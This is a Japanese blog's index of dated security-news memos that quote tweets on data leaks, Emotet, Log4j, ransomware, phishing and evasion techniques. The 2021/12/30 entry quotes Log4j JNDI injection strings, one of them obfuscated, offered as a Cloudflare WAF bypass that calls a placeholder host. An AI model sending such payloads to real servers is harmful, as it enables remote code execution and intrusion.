セキュリティ関連メモ

2022/3/13 セキュリティ関連Twitterメモ

NVIDIA社員のパスワード数千件がネットに流出、ハッカー集団から奇妙な要求 | TechCrunch Japan https://t.co/AYo5jP70xa — 辻 伸弘 (nobuhiro tsuji) (@ntsuji) Mar 6, 2022 えきねっとのフィッシングサイトを確認しました。ご注意を。 ▼ドメイン ekunta[.]…

2022/3/5 セキュリティ関連Twitterメモ

トレーニングプラットフォーム「BLUE TEAM LABS ONLINE」のご紹介: NECセキュリティブログ | NEC https://t.co/IDTY9cYf3F ログ分析やフォレンジックをゲーム形式で学んでみたい人にとっては良さそう — ほよたか (@takahoyo) Feb 20, 2022 Blinding EDR On W…

2022/2/20 セキュリティ関連Twitterメモ

今週の最初の #Emotet のVT上での結果。 1日経って検出は4割強→7割強。 検出が増える間にメールの情報は盗られてる。 このhashは約10分程度のみの出現で、その先はまた別のhash。 だからEmoCheckのような特化ツールが必要。 サンプルは以下。 https://t.co/F…

2022/2/8 セキュリティ関連Twitterメモ

ルートはメルカリでしたか。しかし、購入した「中古HD」のデータを復元してしまう”善意の”匿名通報者は、どういった方なのかも気になる所です。 「元従業員の売却HDD内に業務文書、データ複製の連鎖で - ラック」 https://t.co/NYBjMVlRgm — キタきつね (@fo…

2022/1/18 セキュリティ関連Twitterメモ

Today, we're open sourcing a log4j JAR scanner. Throw it at a filesystem, detect vulnerable JARs, and even rewrite them in place. Includes a Go API to import the JAR parsing for other applications. https://t.co/TWC4SJFm3p — Eric Chiang (@e…

2021/12/30 セキュリティ関連Twitterメモ

Log4j Cloudflare bypass : ${jndi:dns://aeutbj.example.com/ext} ${jndi:${lower:l}${lower:d}a${lower:p}://example.com/ other WAF : https://t.co/f3Fi7E34TY — H4x0r-DZ (@h4x0r_dz) Dec 11, 2021 Apache Log4j2 2.14.1 RCE (CVE-2021-44228) ??Bypass…

2021/12/12 セキュリティ関連Twitterメモ

I've just published "MAS" Article 1 -- version 1.1. As I'd simplified the original script on page 30, I left (by mistake) two dead lines there (now both removed) The new version (A.1) of the PDF (and next updates) will be published here: h…

2021/12/5 セキュリティ関連Twitterメモ

はてなブログに投稿しました #はてなブログ #FoxonSecurity #セキュリティ 日本人パスワードは「数字」「キーボード配列」「日本人名」に加えて「繰り返し語」 - Fox on Security https://t.co/4SXHOo2HDK — キタきつね (@foxbook) Nov 23, 2021 メールで #P…

2021/11/23 セキュリティ関連Twitterメモ

プリンターが止まらない 戦慄のランサムウエア 被害企業が語った|サイカルジャーナル|NHK NEWS WEB https://t.co/cIzvxfwdXl — piyokango (@piyokango) Nov 9, 2021 セキュリティハイプサイクル(日本語)が出てます。(カタカナ率高いのがアレですが・・…

2021/11/9 セキュリティ関連Twitterメモ

WordPress のセキュリティ対策についてしゃべりました! https://t.co/lEx7FKK4TE #wpmeetupkyoto — ym (@ym405nm) Nov 1, 2021 KDDIセキュリティ(au)を騙り偽apkをダウンロードさせる手口のフィッシングメール(SMS)を観測しました。 hivhtwyfaa[.]duckd…

2021/11/1 セキュリティ関連Twitterメモ

面白い基調講演だった。色んな人に伝えていくことも我々の責務ですね #DevelopersIO [レポート]基調講演1:「サイバーセキュリティの万華鏡を揺らす ? 人間行動とサイバーセキュリティへの没入型調査」 ? CODE BLUE 2021 #codeblue_jp https://t.co/XaUdEm9d…

2021/10/18 セキュリティ関連Twitterメモ

弊社、実はひっそりとエンジニアブログを始めてました! 導入編では、サイバー脅威インテリジェンスとは何か?からどんな環境を準備すればいいのかを紹介してます。 今日からできるサイバー脅威インテリジェンスの話-導入編- - NFLabs. エンジニアブログ htt…

2021/10/3 セキュリティ関連Twitterメモ

Meris botnet について、MikroTik のコメント。新しい脆弱性があるというわけではないらしい。2018年の Chimay Red 脆弱性 (Hajime が悪用してたやつ) のパッチ適用前にパスワードぬかれてて、変更してないんじゃないかとのこと。 M?ris botnet information …

2021/9/15 セキュリティ関連Twitterメモ

https://t.co/6obTV4sFXR — Neutral8?9eR (@0x009AD6_810) Aug 24, 2021 IIJ のハニーポットでも Realtek SDK の管理インタフェースの脆弱性を狙う攻撃を 8/22 から観測しています。複数の攻撃者による Mirai 亜種の感染試行で、formWsc と formSysCmd への…

2021/8/23 セキュリティ関連Twitterメモ

東京オリンピックのサイバー関連の出来事についてまとめてみた - piyolog https://t.co/iS3RYvNlXE — にゃん☆たく (@taku888infinity) Aug 9, 2021 企業がランサムウェア攻撃を受けた時にすべきこと | TECH+ https://t.co/qYWlVeoI5Q — にゃん☆たく (@taku88…

2021/8/8 セキュリティ関連Twitterメモ

サイバー攻撃対策ツール23選比較!選び方や導入時の注意点も解説 | マイナビニュース https://t.co/cffXxaE4t5 #にゃんたくメモ — にゃん☆たく (@taku888infinity) Aug 2, 2021 CORSがなぜこうなっているのかの推測。私の動画も見ていただければ。この記事に…

2021/7/17 セキュリティ関連Twitterメモ

はてなブログに投稿しました #はてなブログ #FoxonSecurity #セキュリティ 日本のサイバー能力は落第点 - Fox on Security https://t.co/Z8dWrneclo — キタきつね (@foxbook) Jun 29, 2021 米マイクロソフト、新たな情報漏えいで顧客に警告 | ロイター https…

2021/6/30 セキュリティ関連Twitterメモ

Process Ghosting: https://t.co/NQ1Uun9YYg 新しいアンチウィルス回避テクニックについて。ネーミングが格好良い。 — 白船 (田中ザック) (@yamatosecurity) Jun 15, 2021 富士通株式会社が管理・運営するプロジェクト情報共有ツールへの不正アクセスによる…

2021/6/16 セキュリティ関連Twitterメモ

2021年6月7日 株式会社東芝 「東芝グループ サイバーセキュリティ報告書2021」の発行について https://t.co/o8WWRzrvVV https://t.co/JsCXzP4327 — Autumn Good (@autumn_good_35) Jun 7, 2021 ブログ書きました。 本場のWordPressプラグインのSQLインジ…

2021/6/6 セキュリティ関連Twitterメモ

中国、TikTokなど105アプリが「個人情報を違法収集」 当局が改善求める https://t.co/6vzYMtOTxm習近平指導部は中国IT企業への締め付けを強めており、そうした取り組みの一環となる。 — 産経ニュース (@Sankei_news) May 22, 2021 おっと初耳だぞ…

2021/5/23 セキュリティ関連Twitterメモ

#セキュリティのアレ 第85回 https://t.co/ZdFBYyD78m でActive Directory Federation Service /M365 環境での侵害について触れられていましたが、ADFS利用環境でのセキュリティベストプラクティスはこのまとめをご参照に https://t.co/nrvGUUvTCK — Yurika …

2021/5/5 セキュリティ関連Twitterメモ

PDFサイバー攻撃手法一覧、28ビューアの安全性点検 https://t.co/Ww7whHYwco — ScanNetSecurity (@ScanNetSecurity) April 23, 2021 第二段つーかどこまで調べてるんだこの人…(恐 https://t.co/miC3TS0Z4t — hiro_ (@papa_anniekey) April 23, 2021 AirDrop…

2021/4/24 セキュリティ関連Twitterメモ

最近観測されている、不審メールってこんな流れでしょうか…… pic.twitter.com/wFtISG1Uny — abel (@abel1ma) April 11, 2021 パロアルトネットワークス、「Prisma Access 2.0」を提供開始 https://t.co/VkSmC76xGp https://t.co/NvXuDHyNkT — セキュリティ・…

2021/4/10 セキュリティ関連Twitterメモ

“年収2000万円も”防衛省がサイバーセキュリティのプロを募集|TBS NEWS https://t.co/AFjyc5Gl9R — セキュリティ猫 (@nekochanSec555) April 5, 2021 セキュリティに関連する情報は鮮度が命。「piyolog」の“中の人”piyokangoさんのブログの書き方【エン…

2021/4/5 セキュリティ関連Twitterメモ

今週の収録メモですよ #セキュリティのアレ?? Hot off the press: “今週の気になるセキュリティニュース - Issue #8” https://t.co/WfhegTIFVv (via @revue) — Masafumi Negishi (@MasafumiNegishi) March 28, 2021 https://t.co/eubHhdDxQQ#secure旅団 Podc…

2021/3/27 セキュリティ関連Twitterメモ

「企業における営業秘密管理に関する実態調査2020」報告書について:IPA 独立行政法人 情報処理推進機構 2021年3月18日https://t.co/Xp5dEJp4Lt — piyokango (@piyokango) March 18, 2021 自治体、LINE利用を相次ぎ停止 千葉県や大阪市など:朝日新聞デジタ…

2021/3/19 セキュリティ関連Twitterメモ

ここ最近、ブラウザのプッシュ通知を悪用して偽のセキュリティ警告を表示し、その警告をクリックしたユーザを、フィッシングサイトや不正ファイルのダウンロードサイトへ誘導するケースが多く観測されています。Webブラウジング中にウィルス警告が表示された…

2021/3/7 セキュリティ関連Twitterメモ

前回の検証の続きで、サービスとして登録されたプログラムが他のプロセスを起動したときの調査方法に関する検証を書きました。珍しく頑張った内容です。これでみんなイベントログを有効にしてくれれば、楽に調査が・・・イエ、より有効な調査ができると思い…

2021/2/20 セキュリティ関連Twitterメモ

CyberChefのTips集。あとでゆっくり見てみよう。"CyberChef のオペレーションめも - setodaNote" https://t.co/bx45CUCQ9B — fatsheep白 (@f47sh33p) February 7, 2021 Android関連のレポート読んでみたいなSecurity Researchers Received More Than $6.7 MI…

2021/2/8 セキュリティ関連Twitterメモ

プログラミング言語Perlが公式サイトのドメインをランサムウェア配布サイトに乗っ取られる - GIGAZINE https://t.co/3nYtQ6y9BF — piyokango (@piyokango) February 1, 2021 いやーまだまだありそう。心当たりの会社さんはすぐ確認を。厄介なのは直接のSales…